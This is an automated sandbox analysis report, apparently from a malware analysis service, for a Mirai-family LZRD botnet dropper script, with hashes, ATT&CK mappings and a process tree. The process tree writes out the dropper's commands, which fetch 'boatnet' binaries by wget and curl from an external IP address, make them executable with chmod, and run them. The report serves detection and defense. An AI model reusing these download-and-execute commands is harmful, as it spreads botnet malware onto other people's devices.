mirai | 19d701781a24a57e13181d054c7f3a70d3e205ad72be89fd29dcfa3084e5e396

Analysis

max time kernel
12s
max time network
47s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03-01-2025 11:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

dfb20882adc5a8a441e05549d24a2888
SHA1

9cad12bea5d7cdf2c78c5a00b308f25923c59218
SHA256

19d701781a24a57e13181d054c7f3a70d3e205ad72be89fd29dcfa3084e5e396
SHA512

63ff945d55e5560f99d75c99656b03d1ef70a50900c3c8fcb93fa13d63540c11ba14585c78c202ace742fc924f75f01c4acf43141ff1f1f700ad10c8d72f4bb2

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
793	chmod
799	chmod
682	chmod
696	chmod
741	chmod
759	chmod
775	chmod
788	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/WTF	683	WTF
/tmp/WTF	698	WTF
/tmp/WTF	742	WTF
/tmp/WTF	760	WTF
/tmp/WTF	776	WTF
/tmp/WTF	789	WTF
/tmp/WTF	794	WTF
/tmp/WTF	800	WTF

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTF
File opened for modification	/bin/watchdog	WTF

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 8 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 17 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
685	wget
688	curl
695	cat

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.mpsl	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:652
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:654
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:673
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:681
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:683
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:685
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:688
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:695
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:696
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:698
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:700
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:732
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:740
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:742
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.i468
  2⤵
  PID:745
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:757
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:760
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.i686
  2⤵
  PID:762
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:767
- /bin/cat
  cat boatnet.i686
  2⤵
  PID:773
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:776
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.x86_64
  2⤵
  PID:778
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:783
- /bin/cat
  cat boatnet.x86_64
  2⤵
  PID:787
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:789
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:790
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- /bin/cat
  cat boatnet.mpsl
  2⤵
  PID:792
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:794
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:796
- /usr/bin/curl
  curl -O http://154.216.18.23/hiddenbin/boatnet.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:797
- /bin/cat
  cat boatnet.arm
  2⤵
  PID:798
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:800
- /usr/bin/wget
  wget http://154.216.18.23/hiddenbin/boatnet.arm5
  2⤵
  PID:804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
30KB

MD5
27ee60d65a0b0d6af2a477bb96ca20e9

SHA1
cad4bba0734a87f2ff8eee097a92a140d5224d0b

SHA256
895e78113e4b330ac980707b9488628d2ae48336d9ac494cfde7f603efc614e3

SHA512
9c0b4eb1348b5b9289132551fad227a571a971d9ec69ddcc718001db6ee7ec66d89faf5c6007751a0428a4876ac26e072b9a202dc351cb6810ec99c4f76868b9

Download Submit
/tmp/WTF

Filesize
105KB

MD5
194b9bddea0fed8a1c658381aae3e658

SHA1
0985accf1d90f302910f13615359a64b5dd42a8a

SHA256
9e35db01d13839e7c92014a0d4244d39bea63aa8ac011d252013567758fe50f3

SHA512
cc793be8b7142430f465e6847323c3f015316738d500df66c7ad2430717fe7c873287a533e8ce55be6ea53886c2872230acbffefb8ae6c143306972860f0752e

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/WTF

Filesize
220B

MD5
a8f502a6fb3b7b940e922c951d9e493a

SHA1
fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

SHA256
748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

SHA512
e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

Download Submit
/tmp/WTF

Filesize
31KB

MD5
76a7949d753bbc8a3b176cbb6a8146e7

SHA1
c2cd22e7dcd8c00ace2af3bf4c9e3f85c66bbd99

SHA256
8638fb2da0209be3bab25f3eee698a2e249bfb6313b7a67c7d05abddb2b1189c

SHA512
07c0d865a1c080db18c50a98de4c8a6137e9684e307b5af531a027d9c11f09f4977d9bba16bb0959eacf0c58daf173290a556afb0e7b74faf0f772377e0519ae

Download Submit
/tmp/boatnet.x86

Filesize
28KB

MD5
eae146a902f2fe0cfaf85240434db7c6

SHA1
f0d8349f832c17eafbc17adb648a5f104b008309

SHA256
b48028f95d683e1dd1ab7b71f8d18c0b0ae27eecb13535fa846cb4b8be455610

SHA512
4ec3bc79b2592f517cc42c4990e725d6ccc8e14b9b69f26de0cee032d7872f1956c3e6f9821cc95cbef4a768151b924cc2bab07e42b89e353ef6bea0afc65e40

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads